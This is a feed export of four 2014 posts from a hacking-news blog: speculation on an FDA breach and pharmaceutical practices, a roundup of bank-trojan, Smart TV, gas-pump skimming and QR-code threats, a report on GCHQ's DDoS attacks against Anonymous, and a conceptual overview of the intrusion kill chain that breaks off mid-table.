tag:blogger.com,1999:blog-39684834163614293862024-03-14T00:24:06.795+05:30VOGH- VOICE OF GREYHAT| Leading Resource of Cyber Updates & Hacker News Voice Of GREYHAT (VOGH) is a Leading Cyber Security and Hacking News Source, dedicated in providing updates related to hacking, technology, malwares, vulnerabilities and cyber threat to Security experts, Hackers, Researchers worldwide.Unknownnoreply@blogger.comBlogger2396125tag:blogger.com,1999:blog-3968483416361429386.post-16692929079656524682014-02-10T19:32:00.000+05:302014-02-18T23:13:52.904+05:30The U.S. Food & Drug Administration (FDA) Hack - What is Big Pharma Hiding From You?<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: red;"><strong><span style="font-family: inherit; font-size: large;">The </span></strong><span style="text-align: left;"><span style="font-size: large;"><b>Food & Drug Administration (</b></span></span></span><span style="font-family: inherit; font-size: large;"><span style="color: red;"><b>FDA) Hack </b>-</span> What is Big Pharma <b>Hiding From You?</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinjbY-y_xyggiJ9s3Ei7B4gyhw80yWJ-Yf71JLn9cJns5LDcVm4ZcCwun3CRXfzvEMmTWOLQhg-zhTap_8x1CStU4w9AhFdXzHRxJG86B1o2aMFt8GuoKYf16efvrcj37AK5sYWac4jrw/s1600/FDA-Hack-vogh-exclusive.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinjbY-y_xyggiJ9s3Ei7B4gyhw80yWJ-Yf71JLn9cJns5LDcVm4ZcCwun3CRXfzvEMmTWOLQhg-zhTap_8x1CStU4w9AhFdXzHRxJG86B1o2aMFt8GuoKYf16efvrcj37AK5sYWac4jrw/s1600/FDA-Hack-vogh-exclusive.jpg" height="250" width="500" /></a></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">During the summer of last year, there was a growing controversy
surrounding the FDA’s request to <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers </a>to expose holes in medical
devices security, such as insulin devices and other wireless and
computer connected home and hospital devices. Understandably, many
<a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> and <a href="http://www.voiceofgreyhat.com/search?q=security+experts">security experts</a> were not particularly keen to attempt or
test the security of these devices, for fear of incorrect perception,
and potential outcry. In December last year, the FDA was itself the
target of an hacking operation, in particular the system used by
pharmaceutical companies to input data on drug tests, results, clinical
trials, and so on. Whether this was an attack by cyber thieves, as the
FDA claims, or</span><span style="font-family: inherit;"> </span><a href="http://www.voiceofgreyhat.com/2013/11/OpKillingBay-anonymous-threaten-japan-dolphin-hunt.html" style="font-family: inherit;" target="_blank">hacktivists</a><span style="font-family: inherit;"> </span><span style="font-family: inherit;">remains to be seen. </span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<strong><span style="font-family: inherit;">Corporate Theft or Exposing the Truth?</span></strong></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
The FDA of course, was quick to denounce the attack as a cyber theft. The information <a href="http://medcitynews.com/2013/12/fda-hacked-pharmaceutical-companies-push-online-security-audit/" target="_blank">reported to have been accessed</a> included
medical trial data, marketing information and strategy, and information
about drug manufacturing. While on the surface, we could very well
accept that this could be a simple case of corporate espionage, it is
worth remembering that any company that wants drug approval in the US
has to go through the FDA first. Is running the risk of potentially
alienating the very body that approves your products a strategy that a
multi billion dollar pharmaceutical company would really undertake?
While it can’t be rules out as a possibility, unless the hackers come
forward, it does seem unlikely. It’s also important to remember that
there is a large amount of controversy surrounding the pharmaceutical
industry all over the world, but especially in the states. Could
hacktivists have been responsible for the attack? If so, what could be
the causes for such as attack? As we will see, there may be more than we
might initially think.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<strong><span style="font-family: inherit;">Practice and Method - How Big Pharma Operates</span></strong></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
In the US alone, it is estimated that around <a href="http://www.cbsnews.com/news/study-shows-70-percent-of-americans-take-prescription-drugs/%20" target="_blank">70% of the population</a> takes
prescription drugs. Given the amount of people in the US is estimated
to be over 300 million, that is a staggering number. With such a large
amount of people taking these drugs, addiction rates are rising rapidly -
so much so, that currently prescription addicts are more common than
illegal drug addicts. It is a very real problem that continues to be
skirted around by the US regulators and administration. In fact, where
as knowing the signs of heroin or crack cocaine addiction were important
pieces of information for people who suspected they may have an addict
among friends or family, the same is now true for widely available
prescription drugs, and many Americans are being encouraged to <a href="http://drugabuse.com/library/how-to-help-an-opiate-addict/" target="_blank">learn more about the potential causes and signs</a> of prescription drug abuse, by drug charities and non profit institutions.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
At the center of this problem lies the pharmaceutical industry. Adverts
for medications are common, and standard practice for getting new drugs
to market includes rigging clinical trials to get the desired results in
clever ways that do not outright break the law, invasive marketing
schemes on family doctors and consumers, where doctors will often be
offered ‘sweeteners’ such as free lunches, travel to events, or even
help building their reputation as speakers at industry funded
conferences. The FDA is also, despite being an independent regulatory
body, often effectively ‘bought out’ by companies looking to get drugs
to market fast. There is the additional problem that all drug test data
is not available for public consumption, meaning academics and doctors
are unable to view results of tests or trials for themselves. This has
led to a number of large law suits in the US, and around the world, as
well as in extreme cases, deaths directly related to withheld side
affects of new drugs.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<strong><span style="font-family: inherit;">Coincidence or Calculated?</span></strong></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
We might then speculate on the nature of the accessed data once again.
Bearing in mind the nature of how the industry operates, and the
information that was accessed, we could quite easily draw a link between
the two, and surmise that the hack may well have been the work of a
<a href="http://www.voiceofgreyhat.com/search?q=hacktivist">hacktivist</a> movement. Of course, there is no way to prove whether this
was the case or not, but given the ambitious actions of a number of
groups over the last few years, it certainly can’t be ruled out.</span></div>
<br />
<div class="yj6qo ajU">
<div aria-label="Show trimmed content" class="ajR" data-tooltip="Show trimmed content" id=":1rb" role="button" style="text-align: justify;" tabindex="0">
<b><u>Disclaimer:-</u></b> At perfection <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b> felicitate <b><a href="http://www.voiceofgreyhat.com/search/label/Eve%20Pearce">Eve Halton</a> </b>for sharing this luminous article with our readers. Eve is a very much passionate Fleet Street, she has done her graduation in International Business and Journalism. Eve, this time also you have done eminent job, we love you :)<br />
<br /></div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-62583309120947038912014-02-10T19:31:00.005+05:302014-02-18T23:13:54.139+05:30What Risk We are Posing! Everyone Can Become Target of the Latest Cyber Security Threats <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="text-align: left;"><span style="font-size: large;"><b><span style="color: red;">What Risk We are Posing!</span></b> </span></span><span style="font-family: inherit; font-size: large;">Everyone Can Become a <b>Target</b> of the Latest <b><span style="color: red;">Cyber Security Threats</span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3egtwU-8h2Kb-nce90rC9I89MsATyZEGZF7z_uYx_ti1Ol5K-zTdORMr_G35x6JxCcO03r4p0cihBj0TfMNRbLBqqCRPr323HS0kQNDyy1BifXdLXXGRXyVaRkRNiNR7Gu5sOEEljmTU/s1600/cyber-threats-everyone-can-become-target.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3egtwU-8h2Kb-nce90rC9I89MsATyZEGZF7z_uYx_ti1Ol5K-zTdORMr_G35x6JxCcO03r4p0cihBj0TfMNRbLBqqCRPr323HS0kQNDyy1BifXdLXXGRXyVaRkRNiNR7Gu5sOEEljmTU/s1600/cyber-threats-everyone-can-become-target.jpg" height="280" width="450" /></a></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">According to a report by the </span><a href="http://articles.washingtonpost.com/2012-12-13/business/35789679_1_cybersecurity-firm-hackers-banks-in-recent-months" style="font-family: inherit;" target="_blank">Washington Post</a><span style="font-family: inherit;">,
hackers may soon be setting up a plan to unfold in 2013 that will
target 30 different U.S. banking institutions. </span><a href="http://www.voiceofgreyhat.com/search?q=McAfee" style="font-family: inherit;">McAfee Labs</a><span style="font-family: inherit;">, who has
compiled a new </span><a href="http://www.voiceofgreyhat.com/search?q=cyber+security" style="font-family: inherit;">cyber security </a><span style="font-family: inherit;">report, says that banks should be on the
lookout for software that creates false online transactions or targets
transfers tied to large dollar amounts.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Sources
say that these threats can all be tied back to <b>“Project Blitzkrieg”</b>,
which is a program that has been around since 2008. Within the past four
years, it has already stolen $5 million and plans to continue for as
long as possible. During the past few months, between 300 and 500
victims located within the U.S. have fallen victim to Project
Blitzkrieg’s schemes. By the spring of 2013, McAfee says that things
could get even worse for U.S. banks and their customers.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Experts
note that this scheme may be tied to reports from back in October by
security company <a href="http://www.voiceofgreyhat.com/search?q=RSA">RSA</a> that mentioned how a hacker out of <a href="http://www.voiceofgreyhat.com/search?q=Russia">Russia</a> named
<b>“vorVzakone”</b> has been openly discussing his plan to recruit a team to
plan the largest Trojan attack tied to banking. McAfee warns that these
threats should be taken extremely seriously as the beginning of 2013 is
soon to unfold. The software can become extremely dangerous to those
doing their banking online because it can replicate transactions and
even delete e-mail notifications about certain transfers.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">While
<a href="http://www.voiceofgreyhat.com/search?q=bank">U.S. banks</a> will no doubt be increasing their security protocols to
protect themselves from any unnecessary attacks, most already know that
they are continually being cited as targets from hacking groups around
the globe. Back in September, both <a href="http://www.voiceofgreyhat.com/2012/09/Iran-Accused-Cyber-Attack-Against-US-Banks.html">JP Morgan Chase</a> and <a href="http://www.voiceofgreyhat.com/2012/09/US-banking-Financial-Sector-Suffering-From-DDoS-Attack.html">Bank of America</a>
saw their sites crash because of <a href="http://www.voiceofgreyhat.com/search?q=DDoS">DDoS attacks</a>.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-decoration: underline;"><strong><span style="font-family: inherit;">Samsung Smart TV Dangers</span></strong></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><a href="http://www.theregister.co.uk/2012/12/12/smart_tv_pwned/" target="_blank">The Register</a> has
recently reported that Samsung’s newest Smart TV is completely open and
<a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerable</a> to hacking because it gives hackers the ability to steal
data very quickly. According to security company ReVuln, this
vulnerability most notably affects consumers who own and use their
Samsung 3D TVs for internet purposes.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Those who use their Smart TVs can rent movies, browse the web for a <a href="http://www.money.co.uk/landlines/cheap-line-rental.htm" target="_blank">cheap line rental</a>,
go on Facebook, and more. ReVuln claims that they have found an exploit
which allows hackers to see everything the user is doing while they are
using their TV, retrieve and <a href="http://vimeo.com/55174958" target="_blank">access information</a> like
web history, and hook up an external thumb drive to the TV to
conveniently steal all of this information for future use. While ReVuln
noticed this exploit while using a Samsung 3D TV, the true problem is
that it seems to affect all of the latest Samsung TVs with internet
capabilities, which includes many different makes and models.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">As
these TVs continue to act more as larger PCs, it is only a matter of
time until we see even more security vulnerabilities tied to them in the
very near future.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-decoration: underline;"><strong><span style="font-family: inherit;">Gas Station Bluetooth Skimming</span></strong></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
News site <a href="http://www.kcra.com/news/Thieves-use-Bluetooth-enabled-skimming-devices-at-gas-pumps/-/11797728/17726964/-/dpn6k9z/-/index.html" target="_blank">KRCA</a> out
of Sacramento notes that crooks are using <a href="http://www.voiceofgreyhat.com/search?q=Bluetooth">Bluetooth</a> devices in order to
steal <a href="http://www.voiceofgreyhat.com/search?q=credit+card">credit card</a> information from those who are paying for gas at the
pump. The biggest issue the <a href="http://www.voiceofgreyhat.com/search?q=security+experts">cyber security experts</a> noticed is that these
thieves do not even have to be near the gas station in order to steal
information.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Crooks
are using skimming devices that utilize Bluetooth and contain a variety
of common security keys that can be used to access gas pumps for
maintenance. They don’t simply pull out their device and begin swiping
information for oblivious consumers. Thieves will start by installing
skimmers on the pumps to collect information from those pumping gas and
then pick them back up. Detectives say that these types of devices are
impossible to detect.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">According
to experts, thieves can be up to 100 yards away and continually collect
credit card information from unsuspecting users. Because of this, these
crooks are impossible to detect, and the problem may only grow larger
in the near future.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-decoration: underline;"><strong><span style="font-family: inherit;">Troublesome QR Codes</span></strong></span></div>
<br />
<div style="text-align: justify;">
<span style="font-family: inherit;">
QR codes seem to be everywhere these days. They’re typically on
everything from advertisements to products that we purchase on a daily
basis. In the Netherlands, hackers are posting QR codes in heavily
trafficked areas like airports and major streets. When these QR codes
are scanned in by a user’s smart phone, they are taken to a malicious
website that may attempt to phish information from the user or possibly
infect their <a href="http://www.voiceofgreyhat.com/search?q=smartphone">smartphone</a> with <a href="http://www.voiceofgreyhat.com/search?q=malware">malware</a>.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<b><u>Disclaimer:-</u></b> Before perfection, on behalf of <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, I would like to personally thank <b>Eve Halton </b>for sharing this magnificent article with our readers. Eve is a very much passionate Fleet Street, she has done her graduation in International Business and Journalism. She gained decent experience in writing articles on several fields like global politics, economics, sustainability issues, cyber security & many more.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-9199416848556045142014-02-10T01:49:00.001+05:302014-02-10T01:49:17.399+05:30British Spy Agency GCHQ Performed DDoS Attack Against Anonymous -Snowden Documents Transpired<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;">British Spy Agency<b> GCHQ</b> Performed<b><span style="color: red;"> DDoS Attack</span></b> Against Hacktivist <b>Anonymous</b> & <b>LulzSec</b> -<b><span style="color: red;">Snowden Documents Transpired</span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTE1cIMwsy25Jo5SIVRDofPyvztNO19rfv1eN761TnLZgRsgzwGlfikMNAQa0Sz-Gb41w14ba6QyrHZh-QDT6DNWPrx-FN3WYcuAh3WZLp0KCxciWWOj9KHZ1_wiNdH_6OCMVvR6umY5k/s1600/gchq-ddos-hacktivist-anonymous.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTE1cIMwsy25Jo5SIVRDofPyvztNO19rfv1eN761TnLZgRsgzwGlfikMNAQa0Sz-Gb41w14ba6QyrHZh-QDT6DNWPrx-FN3WYcuAh3WZLp0KCxciWWOj9KHZ1_wiNdH_6OCMVvR6umY5k/s1600/gchq-ddos-hacktivist-anonymous.jpg" height="325" width="600" /></a></div>
<div style="text-align: justify;">
While excavating the past, it was always found that <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminal">cyber criminals</a>, large <a href="http://www.voiceofgreyhat.com/search?q=hacker+collective">hacker collective</a> groups were the culprits for engaging voluminous <a href="http://www.voiceofgreyhat.com/search?q=ddos">denial of service attack</a>. But this widely transfusing story get a one eighty degree reverse turn, when the former <a href="http://www.voiceofgreyhat.com/search?q=NSA">NSA</a> contractor <a href="http://www.voiceofgreyhat.com/search?q=Edward+Snowden"><b>Edward Snowden</b></a> revealed another <a href="http://www.voiceofgreyhat.com/search?q=secret">trade secret</a>. Recently a lurid story get spot lighted, as the <a href="http://www.voiceofgreyhat.com/search?q=whistle+blower">whistle blower</a> Snowden unfold yet another breathtaking stealthy documents taken from the <a href="http://www.voiceofgreyhat.com/search?q=NSA">National Security Agency</a>. The clandestine documents taken the mask from the so called good guys, unveiling <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">British spy agency GCHQ</a> had launched a secret war against the infamous <a href="http://www.voiceofgreyhat.com/search?q=hacktivist">hacktivist</a> collective <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a> and a splinter group known as <a href="http://www.voiceofgreyhat.com/search/label/lulzsec">LulzSec</a> several years ago. Many of you guessed right, this was happened when <a href="http://www.voiceofgreyhat.com/search?q=Anonymous">Anonymous</a> were targeting various <a href="http://www.voiceofgreyhat.com/search?q=UK">UK companies </a>and <a href="http://www.voiceofgreyhat.com/search?q=UK+Government">government</a> websites. The documents disclose that <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">GCHQ</a> carried out seemingly illegal <a href="http://www.voiceofgreyhat.com/search?q=DDoS">DDoS attacks</a> against the collective, flooding their chatrooms with so much traffic that they would become inaccessible – and all with the approval of the British government. The revelations come less than a year after several <a href="http://www.voiceofgreyhat.com/search?q=LulzSec">LulzSec</a> activists were <a href="http://www.voiceofgreyhat.com/search?q=jailed">jailed</a> by a British court for carrying out similar DDoS attacks against targets including the <a href="http://www.voiceofgreyhat.com/search?q=CIA">CIA</a>, the <a href="http://www.voiceofgreyhat.com/search?q=SOCA">UK’s Serious Organized Crime Agency (SOCA)</a>, News International, <a href="http://www.voiceofgreyhat.com/search?q=Sony">Sony</a> and the Westboro Baptist Church, among others. </div>
<div style="text-align: justify;">
This sensational issue was made public by <a href="http://www.voiceofgreyhat.com/search?q=NBC"><b>NBC News</b></a> deferentially with the help of none other than <a href="http://msnbcmedia.msn.com/i/msnbc/sections/news/snowden_anonymous_nbc_document.pdf">Edward Snowden</a>. In their exclusive report headed<b> <a href="http://www.nbcnews.com/news/investigations/war-anonymous-british-spies-attacked-hackers-snowden-docs-show-n21361">'War on Anonymous: British Spies Attacked Hackers,'</a></b> NBC said -The blunt instrument the spy unit used to target hackers, however, also interrupted the web communications of political dissidents who did not engage in any illegal hacking. It may also have shut down websites with no connection to Anonymous. According to the documents, a division of Government Communications Headquarters (GCHQ), the British counterpart of the NSA, shut down communications among Anonymous hacktivists by launching a “denial of service” (DDOS) attack – the same technique hackers use to take down bank, retail and government websites – making the British government the first Western government known to have conducted such an attack.</div>
<div style="text-align: justify;">
The documents, from a PowerPoint presentation prepared for a 2012 NSA conference called <b>SIGDEV</b>, show that the unit known as the Joint Threat Research Intelligence Group, or <b>JTRIG</b>, boasted of using the DDOS attack – which it dubbed Rolling Thunder -- and other techniques to scare away 80 percent of the users of Anonymous internet chat rooms. </div>
<div style="text-align: justify;">
The existence of JTRIG has never been previously disclosed publicly. The documents also show that JTRIG infiltrated chat rooms known as IRCs and identified individual hackers who had taken confidential information from websites. In one case JTRIG helped send a hacktivist to prison for stealing data from PayPal, and in another it helped identify hacktivists who attacked government websites. </div>
<div style="text-align: justify;">
As soon as this story getting all the spot lights, immediately the GCHQ responded to this saying <b>all their movements and operations were lawful</b>. <i>“All of GCHQ’s work is carried out in accordance with a strict legal and policy framework which ensure[s] that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the Secretary of State, the Interception and Intelligence Services Commissioners and the Parliamentary Intelligence and Security Committee. All of our operational processes rigorously support this position.”</i> -GCHQ said the press. To know more detail about this story, don't forget to stay tuned with <a href="http://www.voiceofgreyhat.com/"><b>VOGH</b></a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-6681751930203059982014-02-10T01:49:00.000+05:302014-02-10T01:49:12.680+05:30Implementing Intrusion (Cyber) Kill Chain -A Plenary Overview <div dir="ltr" style="text-align: left;" trbidi="on">
<h1 align="center" style="text-align: center;">
<span style="font-weight: normal;">Implementing an </span><span style="color: red;">Intrusion (Cyber) Kill Chain <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDWtLeRX67so-tEjpRAQvVCQ2tU7FxNiVBdS4Ys9834_1gLHabv13zBxeqzZKKUa24DU5dwk3k4ycf9_PC0Ydxh12g5nM2K75pJqvX5EdgagNX-yXAILWUD9PWOdHvb47FJzx02if-Vs/s1600/Implementing-Intrusion-Kill-Chain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDWtLeRX67so-tEjpRAQvVCQ2tU7FxNiVBdS4Ys9834_1gLHabv13zBxeqzZKKUa24DU5dwk3k4ycf9_PC0Ydxh12g5nM2K75pJqvX5EdgagNX-yXAILWUD9PWOdHvb47FJzx02if-Vs/s1600/Implementing-Intrusion-Kill-Chain.jpg" height="255" width="500" /></a></div>
</span></h1>
<div class="MsoBodyText">
<div style="text-align: justify;">
The Intrusion (Cyber) Kill Chain is a phrase popularized
by infosec industry professionals and introduced in a Lockheed Martin
Corporation paper titled; “ <a href="http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf">Intelligence
Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and
Intrusion Kill Chains</a>”. </div>
</div>
<div class="MsoBodyText">
<div style="text-align: justify;">
The intrusion kill chain model is derived from a military
model describing the phases of an attack. The phases of the military model are:
find, fix, track, target, engage, and assess. The analyses of these phases are
used to pinpoint gaps in capability and prioritize the development of needed
systems. The first phase in this military model is to decide on a target
(find). Second, once the target is decided you set about to locate it (fix). Next,
you would surveill to gather intelligence (track). Once you have enough
information, you decide the best way to realize your objective (target) and
then implement your strategy (engage). And finally, you analyze what went wrong
and what went right (assess) so that adjustments can be made in future attacks.<o:p></o:p></div>
</div>
<div class="MsoBodyText">
<div style="text-align: justify;">
Lockheed Martin analysts began by mapping the phases of
cyber attacks. The mapping focused on specific types of attacks, Advanced
Persistent Threats (APTs) - The adversary/intruder gets into your network and
stays for years– sending information, usually encrypted – to collection sites
without being detected. Since the intruder spent so much time in the network,
analysts were able to gather data about what was happening. Analysts could then
sift through the data and begin grouping it into the military attack model
phases. Analysts soon realized that while there were predictable phases in
cyber attacks, the phases were slightly different from the military model. The intrusion (cyber) kill chain shown below,
describe the phases of a cyber attack.</div>
</div>
<div class="MsoBodyText">
<o:p></o:p></div>
<div class="MsoBodyText">
<div style="text-align: justify;">
The chain of events or activities are as follows:</div>
</div>
<div class="MsoBodyText">
<o:p></o:p></div>
<div class="MsoBodyText">
<o:p> </o:p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl7iZqE5Xk5H6FkkjxWqcdlO5Mm8P0DxbLmK4h-dzlwGwfh1ngEMCX1li2AnR07dXncHUig0FeI2vobNI5S8Cj7G57TagoMmG4Bly1nLf9HQnZ1Hur0-SFHsrdRmZABHNBsyfBmmUsKQ4/s1600/Intrusion-chain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl7iZqE5Xk5H6FkkjxWqcdlO5Mm8P0DxbLmK4h-dzlwGwfh1ngEMCX1li2AnR07dXncHUig0FeI2vobNI5S8Cj7G57TagoMmG4Bly1nLf9HQnZ1Hur0-SFHsrdRmZABHNBsyfBmmUsKQ4/s1600/Intrusion-chain.png" height="56" width="600" /></a></div>
<br />
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 2.75pt; mso-padding-alt: 2.75pt 2.75pt 2.75pt 2.75pt; mso-table-layout-alt: fixed;">
<tbody>
<tr>
<td style="background: #CCCCCC; border-right: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-top-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
Link in the Chain<o:p></o:p></div>
</td>
<td style="background: #CCCCCC; border: solid black 1.0pt; mso-border-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Description<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
1.
Reconnaissance<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Research, identification and selection of targets-
scraping websites for information on companies and their employees in order
to select targets.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
2.
Weaponization<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Most often, a Trojan with an exploit embedded in
documents, photos, etc.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
3. Delivery<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Transmission of the weapon (document with an embedded
exploit) to the targeted environment.
According to Lockheed Martin's Computer Incident Response Team
(LM-CIRT), the most prevalent delivery methods are email
attachments,websites, and USB removable media.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
4. Exploitation<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
After the weapon is delivered, the intruder's code is
triggered to exploit an operating system or application vulnerability, to
make use of an operating system's auto execute feature or exploit the users
themselves.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
5. Installation<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Along with the exploit the weapon installs a remote
access Trojan and/or a backdoor that allows the intruder to maintain presence
in the environment<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
6. Command and
Control<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Intruders establish a connection to an outside
collection server from compromised systems and gain 'hands on the keyboard'
control of the target's compromised network/systems/applications.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
7. Actions on
